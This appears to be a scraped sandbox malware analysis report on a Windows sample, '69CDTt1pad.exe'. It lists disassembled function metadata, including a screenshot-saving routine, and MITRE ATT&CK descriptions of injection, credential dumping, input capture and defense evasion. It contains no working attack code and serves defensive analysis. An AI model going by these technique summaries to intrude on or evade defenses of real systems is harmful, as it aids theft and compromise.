Opcode Fuzzy Hash: a32b2e93c0948379f4ad55548d37ef94994081cf509540a596bb87d0bfefca72
Instruction Fuzzy Hash: 25115E71A0011DABCF04DFD9DC81ADEB7B9FF49318F10006AE505B7241E739A905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00426C28, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00426C62

Strings

%lld, xrefs: 00426C4A
%!.15g, xrefs: 00426C58

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: %!.15g$%lld
API String ID: 3906573944-2983862324
Opcode ID: d293c31393d2ee8fc47e58339c31be2357b3781f43d9eac174bab924335f4ddf
Instruction ID: 06ac19610f5184229030336a38be9b02d29dedadd2dedddfc7cdae57250de72e
Opcode Fuzzy Hash: d293c31393d2ee8fc47e58339c31be2357b3781f43d9eac174bab924335f4ddf
Instruction Fuzzy Hash: AB01B1B1604751AAD731ABA7E806727BBE0AF04710F208C1FF4E6845D2C72CE480971D

Uniqueness

Uniqueness Score: -1.00%

Function 0046016E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0045FF03: GdipAlloc.GDIPLUS(00000010,0046018A,?,00000000), ref: 0045FF05

Part of subcall function 004600B7: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600CE

GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 004601AB

Strings

screenshot.jpg, xrefs: 004601A3
image/jpeg, xrefs: 00460190

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$Image$AllocEncodersFileSaveSize
String ID: image/jpeg$screenshot.jpg
API String ID: 2572949680-3715547155
Opcode ID: b0517da4fb1eaaba302a9684bffc3c6f08a1d6dfe89aa7a4805665cada2cec43
Instruction ID: 7a57e75ca1768edc6c65ef545af934658a787f414639848eab7f3a9d33611f74
Opcode Fuzzy Hash: b0517da4fb1eaaba302a9684bffc3c6f08a1d6dfe89aa7a4805665cada2cec43
Instruction Fuzzy Hash: 90F03671A10305ABDB10EB65CD42F9F77E89F14708F50006BF905DB291EB65A904CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00460310, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00460340
__CxxThrowException@8.LIBCMT ref: 00460355

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Strings

8-@, xrefs: 0046034E

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: 4162bb4bb925c475a9cc468d5079272aca68e220537e8841491e6e1aeebe2401
Instruction ID: 0df25e3d1f1bed0149a28c4af024d16b98eecca61c5793de9f239fe40cd15379
Opcode Fuzzy Hash: 4162bb4bb925c475a9cc468d5079272aca68e220537e8841491e6e1aeebe2401
Instruction Fuzzy Hash: B8E09B755106096BCF1CFB69D4516EF7BAC5F00749F10442FE801D5241FB78D644875E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00402DEA
__CxxThrowException@8.LIBCMT ref: 00402DFF

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Strings

8-@, xrefs: 00402DF8

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: ce5937536e1f9b0eaea7a6533e4368813eb989fd62ebea9c1deb119d3cb0241b
Instruction ID: 7c8bf048ef3b7d2ba6bab027e70f786b3a237f7931194d93d9f492ab3b216c1e
Opcode Fuzzy Hash: ce5937536e1f9b0eaea7a6533e4368813eb989fd62ebea9c1deb119d3cb0241b
Instruction Fuzzy Hash: BAE065715002096BCF14EBA9C595ADE37AC5F0035CF20853FE511E65C1FB78DA458B99

Uniqueness

Uniqueness Score: -1.00%

Function 00462149, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00462150

Part of subcall function 00411E1C: __EH_prolog3.LIBCMT ref: 00411E23

Strings

-#F, xrefs: 00462160
H<@, xrefs: 0046217A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3
String ID: -#F$H<@
API String ID: 431132790-830177581
Opcode ID: b6e1030403a70a675587aa562dbd9d912171b4e33ce7162f0704a40472f3b4d1
Instruction ID: f1a89b40ffa2e15e5409517ec97d96a03a3ae3c430ca20567ffcd6a2c48a8764
Opcode Fuzzy Hash: b6e1030403a70a675587aa562dbd9d912171b4e33ce7162f0704a40472f3b4d1
Instruction Fuzzy Hash: FCE0BF786002148FD710EF59C549A9CB7E0BF04308F45859EE9418B365DBB8DD05CB59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 69CDTt1pad.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre